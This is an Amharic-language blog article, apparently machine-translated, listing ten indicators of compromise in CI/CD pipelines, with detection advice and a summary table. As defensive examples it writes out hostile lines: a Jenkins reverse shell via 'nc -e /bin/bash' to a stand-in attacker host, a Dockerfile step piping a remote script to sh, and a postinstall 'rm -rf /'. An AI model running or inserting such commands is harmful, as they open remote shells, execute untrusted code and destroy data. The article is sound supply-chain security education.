መግቢያ፡- በሳይበር ደህንነት ውስጥ የመደራደር አመላካቾች ምንድናቸው?
የስምምነት ምልክቶች ስርዓትዎ ወይም pipeline ጥቃት ሊደርስበት ይችላል። በቀላል አነጋገር፣ የስምምነት አመልካቾች እንደ እንግዳ ነገር በአጥቂዎች የተተዉ ዱካዎች ናቸው loginዎች፣ የፋይል ለውጦች ወይም የተደበቁ ማልዌር። በ የIOC የሳይበር ደህንነትበወንጀል ቦታ ላይ እንደ አሻራ ሆነው ይሠራሉ፣ ይህም የሆነ ችግር እንዳለ ግልጽ ማስረጃ ይሰጡዎታል። ስለዚህ፣ ገንቢዎች ሲጠይቁዎት የስምምነት አመልካቾች ምንድናቸው?መልሱ በአገልጋዮች ወይም በፋየርዎሎች ብቻ የተወሰነ አይደለም፣ በዘመናዊ ሁኔታዎች ውስጥ የተደበቁ አደጋዎችንም ያካትታል CI/CD pipelines.
በእነዚህ ውስጥ pipelineዎች፣ አጥቂዎች ኮድን ሊቀይሩ፣ ተንኮል አዘል ጥገኝነቶችን ሊወጉ ወይም የግንባታ ደረጃዎችን ሳይስተዋሉ ሊቀይሩ ይችላሉ። ሆኖም ግን፣ አብዛኛዎቹ መመሪያዎች አሁንም በአገልጋዮች ወይም በአውታረ መረቦች ላይ ብቻ ያተኩራሉ። በዚህም ምክንያት የሶፍትዌር አቅርቦት ሰንሰለት በጣም ቀላል ከሆኑ ኢላማዎች አንዱ ሆኗል።
ለዚህም ነው የስምምነት አመልካቾችን በ ውስጥ ማግኘት CI/CD pipelineኤስ (s) አስፈላጊ ነው። ከሁሉም በላይ ደግሞ ቡድኖች ማልዌርን እንዲያግዱ፣ ምስጢሮችን እንዲጠብቁ እና እያንዳንዱን የሶፍትዌር አቅርቦት እንዲጠብቁ ይረዳል።
በ ውስጥ 10 ከፍተኛ የመደራደር አመላካቾች CI/CD Pipelines
የስምምነት አመልካቾችን ሲያብራሩ፣ አብዛኛዎቹ ዝርዝሮች በአገልጋዮች ወይም በአውታረ መረቦች ላይ ያተኩራሉ። CI/CD pipelineዎች፣ አጥቂዎች በጣም የተለያዩ የጣት አሻራዎችን ይተዋሉ። እነዚህን ምልክቶች ማወቅ ለቅድመ መከላከያ ወሳኝ ነው። ከዚህ በታች እያንዳንዱ ገንቢ እና የደህንነት መሐንዲስ ሊከታተላቸው የሚገቡ 10 የIOC የሳይበር ደህንነት ባንዲራዎች ናቸው።
1. አጠራጣሪ የጥገኝነት ለውጦች
የስምምነት ዋና ዋና አመልካቾች አንዱ በ... pipelines ድንገተኛ፣ እንግዳ የሆነ የጥገኝነት ዝማኔ ነው። አጥቂዎች ብዙውን ጊዜ አደገኛ ፓኬጆችን ለመጨመር የገንቢዎችን እምነት በፓኬጅ አስተዳዳሪዎች ውስጥ ይጠቀማሉ።
ለምሳሌ፣ በ npm a package.json ልዩነቱ በድንገት የሚከተሉትን ሊያካትት ይችላል
እንደዚህ ያሉ ለውጦች ደህንነቱ የተጠበቀ ሊመስሉ ይችላሉ ነገር ግን በእያንዳንዱ ግንባታ ውስጥ ትሮጃኒዝድ ኮድ ማስገባት ይችላሉ።
ተጽእኖ: የተጎዱ ግንባታዎች ከምንጩ ማልዌር ይወርሳሉ።
ምርመራ የጥገኝነት ግምገማዎችን ያስፈጽሙ፣ የፋይል መቆለፊያ ልዩነቶችን ይከታተሉ እና አዳዲስ ፓኬጆችን ሁልጊዜ ይቃኙ።
2. በግንባታዎች ውስጥ የተደበቀ ኮድ
የማልዌር ደራሲዎች ግምገማዎችን ለማለፍ በማድበስበስ ላይ ይተማመናሉ። በዚህም ምክንያት፣ ይህ የስምምነት አመላካች በ CI/CD pipelineዎች ለመያዝ በጣም ከባድ ከሆኑት ውስጥ አንዱ ሊሆን ይችላል። እንደ እውነቱ ከሆነ፣ የተደበቁ የክፍያ ጭነቶች ብዙውን ጊዜ ያለማሳወቂያ ወደ ክፍት ምንጭ ቤተ-መጻሕፍት ወይም የኮንቴይነር ምስሎች ውስጥ ይገባሉ።
ለምሳሌ:
- የፒፒአይ ፓኬጅን የሚጠቀም
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - አስፈላጊ ባልሆኑ የUPX ባይነሪዎች የተሞላ የዶከር ምስል።
- ጃቫስክሪፕት የተሞላ
\x41\x42የምስክርነት ሰረቆችን በመደበቅ ያመልጣል።
ተጽእኖ: የተደበቀ ኮድ በግንባታ ወይም በአሂድ ጊዜ በጸጥታ ይሰራል፣ ይህም በIOC የሳይበር ደህንነት ላይ ወሳኝ ምልክት ያደርገዋል።
ምርመራ ያዋህዱ SAST በተንኮል አዘል ዌር ቅኝት የተመሰጠረ ወይም የታሸገ ኮድን ለመጠቆም። ከሁሉም በላይ፣ ድብቅነትን እንደ ተጨማሪ ምርመራ የሚገባ ቀይ ባንዲራ አድርገው ይመለከቱት።
3. በጂት ውስጥ የተገለጹ ምስጢሮች፡ ክላሲክ የአይኦሲ የሳይበር ደህንነት አደጋ
CI/CD pipelineብዙውን ጊዜ ምስጢሮችን በቀጥታ ከማከማቻ ማከማቻዎች ይወርሳሉ። ሆኖም ግን፣ ምስጢሮች በጊት ውስጥ ሲታዩ"በ" ውስጥ የስምምነት አመልካቾች ምንድን ናቸው ለሚለው ጥያቄ በጣም ግልጽ ከሆኑ መልሶች አንዱ ይሆናሉ። pipelineምስክርነቶች አንዴ ወደ ጊት ከደረሱ በኋላ፣ አጥቂዎች ላልተወሰነ ጊዜ ሊበዘብዟቸው ይችላሉ።
ለምሳሌ:
- A
.envፋይል የያዘAWS_SECRET_KEY=. - ቶከኖች ወደ ውስጥ ገብተዋል
config.json. - ከተወገዱ በኋላም ቢሆን በጂት ታሪክ ውስጥ አሁንም ምስጢሮች ይታያሉ።
ተጽእኖ: የተጋለጡ ቁልፎች ለአጥቂዎች ቀጥተኛ መዳረሻ ይሰጣሉ CI/CD pipelineዎች፣ የደመና ስርዓቶች ወይም የውሂብ ጎታዎች። ስለዚህ ይህ በጣም አደገኛ ከሆኑ የስምምነት አመልካቾች አንዱ ነው።
ምርመራ ጥቅም pre-commit hooks እና ለሲአይ (CI) የሚስጥር ቅኝት ስራዎችን ይሰራል፣ እና የተፈሱ ቁልፎችን ወዲያውኑ ይሰርዙ። በተጨማሪም፣ የተጋላጭነት መስኮቶችን ለመቀነስ አውቶማቲክ ማስተካከያዎችን ያስፈጽሙ።
4. ተስተጓጉሏል Pipeline ውቅሮች፡ የተደበቁ የመደራደር አመልካቾች
Pipeline ውቅሮች ከፍተኛ ዋጋ ያላቸው ኢላማዎች ናቸው ምክንያቱም አንድ ማሻሻያ ብዙውን ጊዜ አጠቃላይ የስራ ፍሰቱን ይሰርቃልበዚህም ምክንያት፣ ተበላሽቷል pipeline ፋይሎች ባህላዊ የክትትል መሳሪያዎች እምብዛም የማያውቋቸው ዋና የIOC የሳይበር ደህንነት አደጋዎች ናቸው።
ለምሳሌ:
በጂትሆብ እርምጃዎች ውስጥ፡
- በጂትላብ ውስጥ፡ ተንኮል አዘል ስራ ተጨምሯል
.gitlab-ci.ymlሚስጥራዊ መረጃዎችን የሚያጠፋ። - በጄንኪንስ፦
sh "nc -e /bin/bash attacker.com 4444".
ተጽእኖ: እነዚህ ያልተፈቀዱ ለውጦች የእርስዎን ያደርጉታል pipeline ለአጥቂዎች ቋሚ የኋላ በር ወደመሆን፣ ይህም በግልጽ የስምምነት አመላካች ሆኖ ይቆጠራል።
ምርመራ የተፈረሙ ውቅሮችን ተግባራዊ ያድርጉ፣ የህዝብ ግንኙነት ማጽደቂያዎችን ይጠይቁ እና ያልተጠበቁ ስራዎችን ይከታተሉ። በተጨማሪም፣ ያዘጋጁ guardrails የተለወጡ የስራ ፍሰቶችን በራስ-ሰር የሚያግድ።
5. ልዩ መብት IaC ነባሪዎች
የተሳሳተ የመሠረተ ልማት ትርጓሜዎች ብዙውን ጊዜ የተደበቁ የኋላ በሮችን ይፈጥራሉ። በዚህም ምክንያት፣ ልዩ የሆኑ ነባሪዎች በ IaC የIOC የሳይበር ደህንነት ክላሲክ አደጋዎች ናቸው።
ለምሳሌ:
- የኩበርኔትስ ማሰማራት የሚፈቅድ ፖድስ
privileged: true. - የሄልሜር ገበታዎች አገልግሎቶችን የሚያጋልጡ ናቸው
0.0.0.0:22.
ተጽእኖ: አጥቂዎች የስር ደረጃ መዳረሻ ያገኛሉ ወይም የውስጥ አገልግሎቶችን በይፋ ያጋልጣሉ። በዚህም ምክንያት እነዚህ ችግሮች የጥቃቱን ገጽታ በከፍተኛ ሁኔታ ያስፋፋሉ።
ምርመራ ተግብር IaC ከመዋሃድዎ በፊት ዝቅተኛውን መብት ለማስፈጸም መቃኘት። በተጨማሪም፣ እያንዳንዱ ውቅር እንደ አንድ አካል መገምገሙን ያረጋግጡ። pipeline.
6. ያልተለመዱ የግንባታ ባህሪያት
አጥቂዎች ብዙውን ጊዜ ይለወጣሉ pipeline በተንኮል ድርጊቶች ውስጥ ለመንሸራተት ባህሪ። በሌላ አነጋገር፣ ያልተለመደ የግንባታ እንቅስቃሴ በ ውስጥ የስምምነት አመልካቾች ምን እንደሆኑ ከሚገልጹት በጣም ግልጽ መልሶች አንዱ ነው። CI/CD pipelines.
ለምሳሌ:
- ወደ እንግዳ ጎራዎች የውጪ አውታረ መረብ ጥያቄዎችን የማድረግ ግንባታዎች።
- የNode.js ፕሮጀክት በድንገት PowerShellን በ...
npm install. - በግንባታ ስክሪፕቶች ውስጥ ያልተገለጹ ትላልቅ ባይነሪዎችን የሚያወርድ የCI ስራ።
ተጽእኖ: የተበላሹ ግንባታዎች እንደ ማልዌር ማከፋፈያ ነጥቦች ሆነው ሊያገለግሉ ይችላሉ። ከሁሉም በላይ ደግሞ በእያንዳንዱ ማሰማራት ላይ ተንኮል አዘል የክፍያ ጭነቶችን ያሰራጫሉ።
ምርመራ ያልተጠበቁ ሂደቶችን ወይም ግንኙነቶችን ለማየት የግንባታ ምዝግብ ማስታወሻዎችን ይከታተሉ። በተጨማሪም፣ ከተለመደው ውጭ ያሉ ባህሪያትን ለመጠቆም ያልተለመደ ምርመራን ያዋቅሩ።
7. እንደ IOC የሳይበር ደህንነት አደጋዎች ተንኮል አዘል የጥቅል ስክሪፕቶች
የጥቅል አስተዳዳሪዎች የህይወት ዑደትን ይደግፋሉ hooks አጥቂዎች የሚጠቀሙበት። ስለዚህ፣ በnpm፣ PyPI ወይም Dockerfiles ውስጥ ያሉ ተንኮል አዘል ስክሪፕቶች የስምምነት ጠንካራ አመልካቾች ናቸው።
ለምሳሌ:
- npm፡
postinstallስክሪፕት በማስኬድ ላይrm -rf /ወይም ወደ C2 ምልክት ማድረግ። - ፒፒአይ፡
setup.pyበመጫን ጊዜ የተደበቀ የፓይቶን ኮድ መፈጸም። - ዶክ ፋይል፡
RUN curl attacker.sh | sh.
ተጽእኖ: ጥቃቱ የሚፈጸመው ከማንኛውም የሩጫ ጊዜ ሙከራ በፊት በመጫን ጊዜ ነው። በዚህም ምክንያት ገንቢዎች ጊዜው እስኪያልፍ ድረስ ላያስተውሉ ይችላሉ።
ምርመራ የመጫኛ ስክሪፕቶችን ለማግኘት የጥቅል መግለጫዎችን ይቃኙ። በተጨማሪም፣ አደገኛነትን ይገድቡ hooks in CI/CD ተጋላጭነትን ለመቀነስ ስራዎች።
8. የመዝገብ መርዝ የስምምነት አመልካቾች
አጥቂዎች በመዝገብ ቤቶች ውስጥ ያሉትን ቅርሶች ይተካሉ ወይም ያሻሽላሉ፣ እና እነዚህ ክስተቶች በአቅርቦት ሰንሰለት ውስጥ የመደራደር አመላካቾች ምን እንደሆኑ የሚያሳዩ የመማሪያ መጽሐፍ ምሳሌዎች ናቸው። pipelines.
ለምሳሌ:
- የዶከር ምስል መለያ በጸጥታ በትሮጃኒዝድ ንብርብር ተዘምኗል።
- ውስጣዊ ጥቅል በተመረዘ ስሪት ተተክቷል።
- npm namespace ስኳት ማድረግ፣ ለምሳሌ
lodash-proxy.
ተጽእኖ: የመዝገብ ቤት ቅርስን የሚጠቀም እያንዳንዱ ግንባታ ይጎዳል። ይህ ብቻ ሳይሆን ስምምነቱ ወደ ታችኛው ክፍል አገልግሎቶችም ይሰራጫል።
ምርመራ በሁሉም የመዝገብ ቤት መጎተቻዎች ላይ የፊርማ እና የታማኝነት ፍተሻዎችን ያስፈጽሙ። በተጨማሪም፣ የቅርስ ምንጭን ይከታተሉ SBOM ማረጋገጫ።
9. ያልተለመደ የተጠቃሚ እንቅስቃሴ እንደ IOC ማስረጃ
የተበላሹ መለያዎች ሁልጊዜ ማለት ይቻላል ያልተለመዱ ምልክቶችን ይተዋሉ። በዚህ መሠረት፣ ያልተለመደ የገንቢ ባህሪ የስምምነት ጠንካራ አመላካች ነው።
ለምሳሌ:
- Commitበአካባቢው ሰዓት አቆጣጠር ከጠዋቱ 3 ሰዓት ላይ ተዘግቷል።
- በእረፍት ጊዜ በሚደረጉ ሂሳቦች የህዝብ ግንኙነት (PR) ማፅደቂያዎች።
- Pipelineባልተለመደ ድግግሞሽ የተቀሰቀሰ።
ተጽእኖ: አጥቂዎች የተሰረቁ የምስክር ወረቀቶችን አላግባብ ይጠቀማሉ፤ ተንኮል አዘል ለውጦችን ለማስገባት። ከሁሉም በላይ፣ ያልተፈቀደ commitኤስ በቀላሉ ወደ መደበኛ የስራ ፍሰቶች ይዋሃዳል።
ምርመራ ተቆጣጠር SCM ያልተለመዱ ነገሮችን ለማስተናገድ የሚደረግ እንቅስቃሴ፣ MFAን ተግባራዊ ማድረግ እና ቶከኖችን አዘውትሮ ማዞር። በተጨማሪም፣ አጠራጣሪ በሆኑ ነገሮች ላይ ማስጠንቀቂያ ይስጡ commit ወይም የማፅደቂያ ቅጦች።
10. በIOC የሳይበር ደህንነት ውስጥ የታማኝነት ወይም የፊርማ ፍተሻዎች አልተሳካም
የተለመደ ግን ችላ የተባለ የስምምነት አመልካች የታማኝነት ወይም የፊርማ ፍተሻ ውድቀት ነው። በIOC የሳይበር ደህንነት ውስጥ፣ እነዚህ ቼኮች ኮድ ወይም ቅርሶች ትክክለኛ መሆናቸውን ያረጋግጣሉ። እነሱን መዝለል ቅጠሎችን መዝለል pipelineተጋልጧል።
ምሳሌዎች:
- የSHA256 ሃሽ ከሚጠበቀው የቼክ ድምር ጋር አይዛመድም።
- የጎደለ ወይም ልክ ያልሆነ የጂፒጂ ፊርማ።
- An SBOM ያልተፈረሙ ቅርሶችን ማሳየት።
ተጽእኖ: የታማኝነት አለመሳካቶች ብዙውን ጊዜ ማበላሸት፣ የመዝገብ መመረዝ ወይም የማልዌር መርፌን ያካትታሉ።
ምርመራ የፊርማ ቼኮችን በራስ-ሰር ያከናውኑ፣ የቼክሰም ማረጋገጫን ያስፈጽሙ እና ያልተፈረሙ ክፍሎችን ያግዱ። ከሁሉም በላይ፣ እያንዳንዱን ያልተሳካ ቼክ እንደ ግልጽ የስምምነት ማስረጃ አድርገው ይቆጥሩት።
CI/CD የመደራደር አመላካቾች በአጭሩ
| የስምምነት አመልካች (IOC) | ውስጥ ተጽዕኖ CI/CD Pipelines | እንዴት ማግኘት እንደሚቻል |
|---|---|---|
| አጠራጣሪ የጥገኝነት ለውጦች | አጥቂዎች በጥቅል አስተዳዳሪዎች ውስጥ ተንኮል አዘል ቤተ-መጻሕፍትን ይረጫሉ፣ ይህም ወደ ጉዳት የሚመሩ ግንባታዎችን ያስከትላል። | የመቆለፊያ ፋይል ልዩነቶችን ይከታተሉ፣ የጥገኝነት ግምገማዎችን ያስፈጽሙ እና ጥገኝነቶችን ያለማቋረጥ ይቃኙ። |
| በግንባታዎች ውስጥ የተደበቀ ኮድ | የተደበቁ የክፍያ ጭነቶች በግንባታዎች ወይም በአሂድ ጊዜ ውስጥ ሳይታወቁ ይከናወናሉ። | ጥቅም SAST እና የቤዝ64፣ የሄክስ ወይም የታሸጉ የኮድ ቅጦችን ለመጠቆም የማልዌር ቅኝት። |
| በጂት ውስጥ የተገለጹ ምስጢሮች | የተፈሱ ቶከኖች ወይም የኤፒአይ ቁልፎች ለአጥቂዎች ወደ ወሳኝ ስርዓቶች ቀጥተኛ መዳረሻ ይሰጣሉ። | በጂት ውስጥ ሚስጥራዊ ቅኝቶችን ያሂዱ hooks እና የፈሰሱ ምስክርነቶችን በራስ-ሰር ይሰርዙ። |
| የተዛባ Pipeline ውቅሮች | የተሻሻሉ የስራ ፍሰቶች በውስጥ የውሂብ ማጣሪያ ወይም ዘላቂነት ያስችላሉ CI/CD. | የህዝብ ግንኙነት ማጽደቂያዎችን ጠይቅ፣ የተፈረሙ ውቅሮችን አስፈጽም እና ተቆጣጠር pipeline ለውጦች. |
| ልዩ መብት ፡፡ IaC ነባሪዎች | ከመጠን በላይ ልቅ የሆኑ ሚናዎች ወይም ደህንነታቸው ያልተጠበቀ ነባሪዎች የደመና አካባቢዎችን ያጋልጣሉ። | ዝቅተኛ መብት ለማስከበር የቴራፎርም፣ የኩበርኔት እና የሄልም ፋይሎችን ይቃኙ። |
| ያልተለመዱ የግንባታ ባህሪያት | Pipelineእንደ ማልዌር ማሰራጫ ነጥቦች ወይም ለጎን እንቅስቃሴ ጥቅም ላይ ይውላል። | ያልተጠበቁ ውርዶችን፣ ሂደቶችን ወይም ወደ ውጭ የሚደረጉ ጥሪዎችን በተመለከተ የግንባታ ምዝግብ ማስታወሻዎችን ይተንትኑ። |
| ተንኮል አዘል የጥቅል ስክሪፕቶች | የተደበቁ የቅድመ-ጭነት/ድህረ-ጭነት ስክሪፕቶች ከማሄድ ጊዜ ሙከራ በፊት የክፍያ ጭነቶችን ያስጀምራሉ። | አደገኛ የnpm/PyPI ስክሪፕቶችን ያግዱ እና በ ውስጥ አፈጻጸምን ይገድቡ CI/CD ስራዎች. |
| የመዝገብ መርዝ | ትሮጃን የተባሉ ቅርሶች በመዝገብ ቤቶች ውስጥ የታመኑ ምስሎችን ወይም ሁለትዮሽ ምስሎችን ይተካሉ። | የቼክ ድምሮችን ያረጋግጡ፣ የፊርማ ማረጋገጫን ያስፈጽሙ እና መዝገቦችን በንቃት ይቃኙ። |
| ያልተለመደ የተጠቃሚ እንቅስቃሴ | የተበላሹ መለያዎች ተንኮል አዘል ዌርን ይገፋፋሉ commitዎች ወይም ቀስቅሴ pipelines. | ኤምኤፍኤውን ተግባራዊ ማድረግ፣ ክትትል ማድረግ commitለአናሎሚዎች s፣ እና መተንተን login ንድፎች. |
| የተሳኩ የታማኝነት ወይም የፊርማ ፍተሻዎች | የተዛቡ ኮዶችን፣ ጥገኞችን ወይም ወደ ውስጥ የሚገቡ ምስሎችን ያመለክታል pipeline. | የታማኝነት ፍተሻዎችን በራስ-ሰር ያድርጉ እና ያልተፈረሙ ወይም ያልተዛመዱ ክፍሎችን ያግዱ። |
ባህላዊ የአይኦሲ የሳይበር ደህንነት ለምን ይጎድላል? CI/CD በጤና ላይ
አብዛኛዎቹ ድርጅቶች በሰርቨሮች፣ ኮምፒውተሮች ወይም ኔትወርኮች ላይ የስምምነት አመልካቾችን አስቀድመው ይከታተላሉ። ሆኖም ግን፣ ይህ ክላሲክ የIOC የሳይበር ደህንነት አካሄድ ችላ ይለዋል CI/CD pipelineዎች፣ አሁን በጣም ወሳኝ ከሆኑ የጥቃት ገጽታዎች አንዱ ናቸው። እንደ እውነቱ ከሆነ፣ pipelineባህላዊ መሳሪያዎች ሊያዩዋቸው የማይችሏቸውን ልዩ የስምምነት ምልክቶችን ያሳያሉ።
በባህላዊ ደህንነት ውስጥ የመደራደር አመላካቾች
በተለመደው የIOC የሳይበር ደህንነት ላይ፣ ትኩረቱ ብዙውን ጊዜ በሚከተሉት ላይ ነው፡
- እንግዳ loginየተሰረቁ ምስክርነቶችን የሚጠቁሙ የአይፒ አድራሻዎች ወይም የአይፒ አድራሻዎች።
- ተንኮል አዘል ዌርን የሚያሳዩ አጠራጣሪ የፋይል ሃሾች ወይም የመዝገብ ለውጦች።
- የውሂብ ማጣራትን የሚያመለክት ያልተጠበቀ የወጪ ትራፊክ።
እነዚህ በዘርፉ ውስጥም የሚታወቁ የታወቁ ጠቋሚዎች ናቸው ሚትሬ ኤቲ ኤንድ ሲኬ ማዕቀፍየተለመዱ የተቃዋሚ ባህሪያትን እና ስልቶችን የሚያመለክት። እነዚህ ጠቃሚ ምልክቶች ናቸው። ሆኖም ግን፣ በዋናነት የሚተገበሩት ለኦፕሬቲንግ ሲስተሞች ወይም ለኮርፖሬት ኔትወርኮች ነው። በዚህም ምክንያት፣ ቀደም ሲል በሶፍትዌር አቅርቦት ሰንሰለት ውስጥ የሚከሰተውን ስውር ማጭበርበር ያመልጣሉ።
እንዴት CI/CD Pipelines የተለያዩ ናቸው።
CI/CD pipelineዎች ገንቢዎች የሚገኙባቸው አውቶማቲክ አካባቢዎች ናቸው commit ኮድ፣ የመጎተት ጥገኝነቶች እና የመልቀቂያ ግንባታዎች። አጥቂዎች እዚህ አንድ ስምምነት በእያንዳንዱ ማሰማራት ውስጥ እንደሚከሰት ያውቃሉ። በዚህ መሠረት፣ የስምምነት አመላካቾች ምንድናቸው? CI/CD pipelineበጣም የተለያዩ ይመስላሉ፡
- በጸጥታ ወደ package.json ወይም requirements.txt የተጨመረ ተንኮል አዘል ጥገኝነት።
- በጂት ውስጥ የተጋለጡ የኤፒአይ ቁልፎች ወይም ቶከኖች commitየs ወይም .env ፋይሎች።
- የተደበቀ ኮድ ወደ npm ወይም PyPI ፓኬጆች ገብቷል።
- እንደ privileged: true ያሉ ደህንነቱ ያልተጠበቀ ነባሪዎች ያላቸው የTerraform ወይም Kubernetes ፋይሎች።
- Pipeline ስራዎች ውሂብን ለማውጣት ወይም የኋላ በሮችን ለመክፈት ተስተካክለዋል።
እነዚህ የስምምነት ምልክቶች በ CI/CD የማይታዩ ሆነው ይቆያሉ standard የደህንነት መሳሪያዎች።
በ IOC የሳይበር ደህንነት ውስጥ ያለው ክፍተት
ብዙ ቡድኖች የስምምነት አመልካቾችን ዋጋ ቢረዱም፣ አሁንም ከአገልጋዮች እና ከአውታረ መረብ ምዝግብ ማስታወሻዎች በመለየት ላይ ብቻ ይተማመናሉ። ስለዚህ፣ አጥቂዎች የተለመዱ ዱካዎችን ሳይተዉ ግንባታዎችን መርዝ ሊመርዙ ወይም ተንኮል አዘል ዌር ሊያስገቡ ይችላሉ። ለዚህም ነው እንደ XZ Utils backdoor ወይም ተንኮል አዘል npm ፓኬጆች ያሉ ክስተቶች ምርት እስኪደርሱ ድረስ ሳይታወቁ የቀሩት።
እነዚህ አይነት የአቅርቦት ሰንሰለት ጥሰቶችም በ CISየአቅርቦት ሰንሰለት ደህንነት መመሪያ (A)አጥቂዎች ኢላማ እያደረጉ እንደሆነ ያስጠነቅቃል CI/CD pipelineኤስ እና መዝገቦች።
Takeaway
ባህላዊ የIOC የሳይበር ደህንነት አስፈላጊ ነው ግን በቂ አይደለም። ከሁሉም በላይ ቡድኖች ለሚከተሉት የተወሰኑ የስምምነት አመልካቾችን መለየት አለባቸው CI/CD pipelineዎች. ተንኮል አዘል ኮድ ወይም pipeline በአካባቢው ከመሰራጨቱ በፊት አላግባብ መጠቀም።





